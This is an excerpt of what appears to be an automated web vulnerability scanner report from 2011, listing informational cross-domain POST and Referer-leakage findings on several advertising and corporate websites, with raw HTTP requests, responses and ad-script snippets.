<a href="/domain-hosting.html" title="Domain Hosting">
...[SNIP]...

Request 2

GET /images/boxtopbackground.gif HTTP/1.1
Host: www.westhost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:43:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15643
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" itemscope itemtype
...[SNIP]...
<input type="hidden" name="referer" value="" />
<label for="name" >Your Name<span class="req">*</span></label><br />
<input type="text" name="name" id="name" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="email" >Email Address<span class="req">*</span></label><br />
<input type="text" name="email" id="email" class="text" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" />
<label for="comments" >Please add your comments / describe the problem further<span class="req">*</span></label><br />
<textarea name="comments" id="comments" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;"></textarea><br/><br/>
   <!--<label for="captcha" >Enter the code shown in the image<span class="req">*</span></label><br />
   <input type="text" class="text" name="captcha" id="captcha" onfocus="changeColor(this); return false;" onblur="changeBack(this); return false;" /><br /><br />-->
    <input type="submit" name="submit" value="Submit" />
</form>
</div>
<!-- CONTENT END -->
</div> <!-- #bodymain -->
<div class="bodybase">&nbsp;</div>


</div> <!-- #mainwhite -->

<div id="logostrip">
<div class="logotext">
<!-- Who's Using Westhost? -->
</div> <!-- .logotext -->
<div id="services"></div>
</div> <!-- #logostrip -->
<div class="clear"></div>

<div id="basetext">
<div class="basecol">
<h3>Hosting Solutions</h3>
<a href="/web-hosting/" title="Web Hosting">Web Hosting</a><br />
<a href="/reseller-hosting/" title="Reseller Hosting">Reseller Hosting</a><br />
<a href="/cloud-hosting/" title="Cloud Servers">Cloud Servers</a><br />
<a href="/managed-dedicated-servers/" title="Dedicated Servers">Dedicated Servers</a><br />

<h3>Domain Registration</h3>
<a href="/domain-registration/" title="Register a Domain ">Register a Domain</a><br />
<a href="/domain-hosting.html" title="Domain Hosting">Domain Hosting</a><br />
</div> <!-- .basecol1 -->
...[SNIP]...

16. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /wifi.shtml

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /wifi.shtml HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.alepo.com/radius-server.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=18704489.631393116.1316220585.1316220585.1316220585.1; __utmb=18704489.1.10.1316220585; __utmc=18704489; __utmz=18704489.1316220585.1.1.utmcsr=radius-server.com|utmccn=(referral)|utmcmd=referral|utmcct=/; alepo_cookie=http%3A//www.radius-server.com/%23%23%23%23undefined%23%23%23%239%5C16%5C111%23%23%23%23%20%23%23%23%23%23%23%23%23-5%3A0

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:52 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 20910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
</script>
<form name="leadform" action="https://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="POST" autocomplete="off">

<p>
...[SNIP]...

17. Cross-domain Referer leakage  previous  next
There are 169 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


17.1. http://3ps.go.com/DynamicAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://3ps.go.com
Path:   /DynamicAd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french HTTP/1.1
Host: 3ps.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV06
Content-Length: 537
Cache-control: no-cache
Pragma: no-cache

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 93093;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>
...[SNIP]...

17.2. http://a.collective-media.net/cmadj/cm.rev_bostonherald/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;env=ifr;ord1=40053;cmpgurl=http%253A//bostonherald.com/includes/processAds.bg%253Fposition%253DTop%2526companion%253DTop%252CRight%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Ftrack%25252Finside_track%25252Farticle? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 8274
Date: Sat, 17 Sep 2011 01:48:46 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
</scr'+'ipt>');var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:90,
ad_w:728,
uqid:bap_rnd,
cps:''
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>');
(function() {
if(document.getElementById('ba.js')) return;
document.write('<sc'+'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js">
...[SNIP]...

17.3. http://abc.csar.go.com/DynamicCSAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abc.csar.go.com
Path:   /DynamicCSAd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DynamicCSAd?srvc=abc&itype=FPBranding&itype=SponsoredByLogo&itype=Footer&itype=Footer2&itype=Footer3&itype=RevenueScience&itype=PopUnder&itype=Banner-Unicast&itype=LRGutters&itype=Background&itype=Survey&itype=Banner&itype=Rectangles&url=/primetime/charlies-angels/bios HTTP/1.1
Host: abc.csar.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240959985%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bbios%255Eabccom%253Aprimetime%253Acharlies-angels%253Aindex%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:05:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV06
Content-Type: application/x-javascript
Content-Length: 4610
Cache-control: no-cache, max-age=0, must-revalidate
Pragma: no-cache


var digHeaderText = "";
function digAdDataContainer(insertionType, creativeHeader, creativeText) {
this.insertionType = insertionType;
this.creative = new Object();
this.creative.he
...[SNIP]...
="http://log.go.com/log?srvc=abc&amp;guid=4923D81A-832E-4BE9-B494-F93DB730C46F&amp;drop=0&amp;addata=1666:52311:794658:52311&amp;a=1&amp;goto=http://abc.go.com/watch?cid=10_fep_footer" target="_blank"><img src="http://Adsatt.ABC.starwave.com/ad/sponsors/ABC_House/Mar_2011/abch-300x100-0366.jpg" width="300" height="100" border="0" alt="" /></a>
...[SNIP]...
mp;guid=D3DD971B-8826-462E-969E-20D53011562D&amp;drop=0&amp;addata=2978:52311:851447:52311&amp;a=1&amp;goto=http://abc.go.com/site/abc-player-for-ipad?cid=ipad_abc_abc300x100_summer11" target="_blank"><img src="http://Adsatt.ABC.starwave.com/ad/sponsors/ABC_House/Aug_2011/abch-300x100-0591.gif" width="300" height="100" border="0" alt="" /></a>
...[SNIP]...
64B-4D25-A3B3-6CD1DF71F958&amp;drop=0&amp;addata=2979:52312:849891:52311&amp;a=1&amp;goto=http://abc.go.com/shows/pan-am?cid=11_housead_crosspromo_PAN_ABC_static_nowthrusept18_300x100" target="_blank"><img src="http://Adsatt.ABC.starwave.com/ad/sponsors/ABC_House/Aug_2011/abch-300x100-0625.jpg" width="300" height="100" border="0" alt="clicktag" /></a>
...[SNIP]...
</div>');

digAdData['RevenueScience'] = new digAdDataContainer('RevenueScience', '', '<script type="text/javascript" src="http://adsatt.abc.starwave.com/ad/sponsors/utilities/detect/main.js"></script>
...[SNIP]...
</script>\n<script type="text/javascript" src="http://adsatt.abc.starwave.com/ad/sponsors/utilities/qcast/main.js"></script>
...[SNIP]...

17.4. http://abc.csar.go.com/DynamicCSAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abc.csar.go.com
Path:   /DynamicCSAd

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DynamicCSAd?srvc=abc&itype=FPBranding&itype=SponsoredByLogo&itype=Footer&itype=Footer2&itype=Footer3&itype=RevenueScience&itype=PopUnder&itype=Banner-Unicast&itype=LRGutters&itype=Background&itype=Survey&itype=Banner&itype=Rectangles&url=/primetime/charlies-angels/bios/eve-french HTTP/1.1
Host: abc.csar.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:07:30 GMT
Server: Microsoft-IIS/6.0
From: SRV01
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Content-Type: application/x-javascript
Content-Length: 4598
Cache-control: no-cache, max-age=0, must-revalidate
Pragma: no-cache


var digHeaderText = "";
function digAdDataContainer(insertionType, creativeHeader, creativeText) {
this.insertionType = insertionType;
this.creative = new Object();
this.creative.he
...[SNIP]...
="http://log.go.com/log?srvc=abc&amp;guid=90D544BE-3533-48A7-B469-600AADBC7D92&amp;drop=0&amp;addata=1666:52311:794658:52311&amp;a=1&amp;goto=http://abc.go.com/watch?cid=10_fep_footer" target="_blank"><img src="http://Adsatt.ABC.starwave.com/ad/sponsors/ABC_House/Mar_2011/abch-300x100-0366.jpg" width="300" height="100" border="0" alt="" /></a>
...[SNIP]...
mp;guid=529CBF7D-9EB3-4D49-B725-7A34584182BD&amp;drop=0&amp;addata=2978:52311:851447:52311&amp;a=1&amp;goto=http://abc.go.com/site/abc-player-for-ipad?cid=ipad_abc_abc300x100_summer11" target="_blank"><img src="http://Adsatt.ABC.starwave.com/ad/sponsors/ABC_House/Aug_2011/abch-300x100-0591.gif" width="300" height="100" border="0" alt="" /></a>
...[SNIP]...
1A-2EE4-4774-80C7-31354E588696&amp;drop=0&amp;addata=2979:52312:856015:52311&amp;a=1&amp;goto=http://abc.go.com/shows/revenge?cid=11_housead_crosspromo_REV_ABC_static_sep15-20_300x100" target="_blank"><img src="http://Adsatt.ABC.starwave.com/ad/sponsors/ABC_House/Sep_2011/abch-300x100-0665.jpg" width="300" height="100" border="0" alt="" /></a>
...[SNIP]...
</div>');

digAdData['RevenueScience'] = new digAdDataContainer('RevenueScience', '', '<script type="text/javascript" src="http://adsatt.abc.starwave.com/ad/sponsors/utilities/detect/main.js"></script>
...[SNIP]...
</script>\n<script type="text/javascript" src="http://adsatt.abc.starwave.com/ad/sponsors/utilities/qcast/main.js"></script>
...[SNIP]...

17.5. https://accounts.usenetserver.com/register/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.usenetserver.com
Path:   /register/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /register/index.php?rate=50&a_aid=uns&a_bid=a76dfb83&gclid=CLDE88zAoqsCFRRSgwod8HVslQ HTTP/1.1
Host: accounts.usenetserver.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 28134
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<title>Register - UseNetServer</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="a
...[SNIP]...
</script>
<script src = "https://ssl.google-analytics.com/ga.js" type = "text/javascript"></script>
...[SNIP]...
<body bgcolor="white" >
   
       <script id = "pap_x2s6df8d" type="text/javascript" src = "https://www.usenetjunction.com/scripts/trackjs.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1034306806/?label=xZQCCIrnuwIQ9omZ7QM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.6. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=33923723&rk1=62964858&rk2=1316239321.3&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*; a=AAAAAAAAAAAAAAAAAAAAAA; __qca=P0-1177288715-1316025191253

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 423
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 160px; height: 600px; border-width: 0px;"><script type="text/javascript">
var pubId=27330;
var siteI
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
...[SNIP]...

17.7. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5781
Date: Sat, 17 Sep 2011 01:08:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jul 27 11:16:02 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
6974/43264761/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/88646/http://www.txu.com/residential/promotions/mass/e-saver-12-2011Q1-save-money.aspx?&PromoCode=BNADA131C&WT.mc_id=ONLBAN11Q3MOVERS2"><img src="http://s0.2mdn.net/2752994/TXU_Display_Movers_Mailbox_728x90F3.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.8. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.yahoo.com/B5098223.106

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N6092.yahoo.com/B5098223.106;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15r7bi98f/M=791180.14780275.14568948.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1316227937/L=bwVTDGKIOPrpARpjTl.wjQPOMhd7ak5z70EABZ7M/B=ujEzMGKJiTc-/J=1316220737421784/K=u7lEbHJbJbau0b_1blFD.w/A=6464717/R=0/*;ord=0.26470078458078206? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6302
Date: Sat, 17 Sep 2011 00:52:57 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 16:54:02 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://global.ard.yahoo.com/SIG=15r7bi98f/M=791180.14780275.14568948.10366300/D=o_m_g/S=2115806991:LREC/Y=YAHOO/EXP=1316227937/L=bwVTDGKIOPrpARpjTl.wjQPOMhd7ak5z70EABZ7M/B=ujEzMGKJiTc-/J=1316220737421784/K=u7lEbHJbJbau0b_1blFD.w/A=6464717/R=0/*http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/7/f4/%2a/h%3B245308059%3B0-0%3B0%3B66874110%3B4307-300/250%3B43585932/43603719/1%3B%3B%7Esscs%3D%3fhttp://www.ramtrucks.com/en/2011/ram_country/?sid=888357&pid=66874110&adid=245308059&channel=display"><img src="http://s0.2mdn.net/2587596/Country_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.9. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N884.abc.com/B5709785.10

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Date: Sat, 17 Sep 2011 01:06:03 GMT
Expires: Sat, 17 Sep 2011 01:11:03 GMT

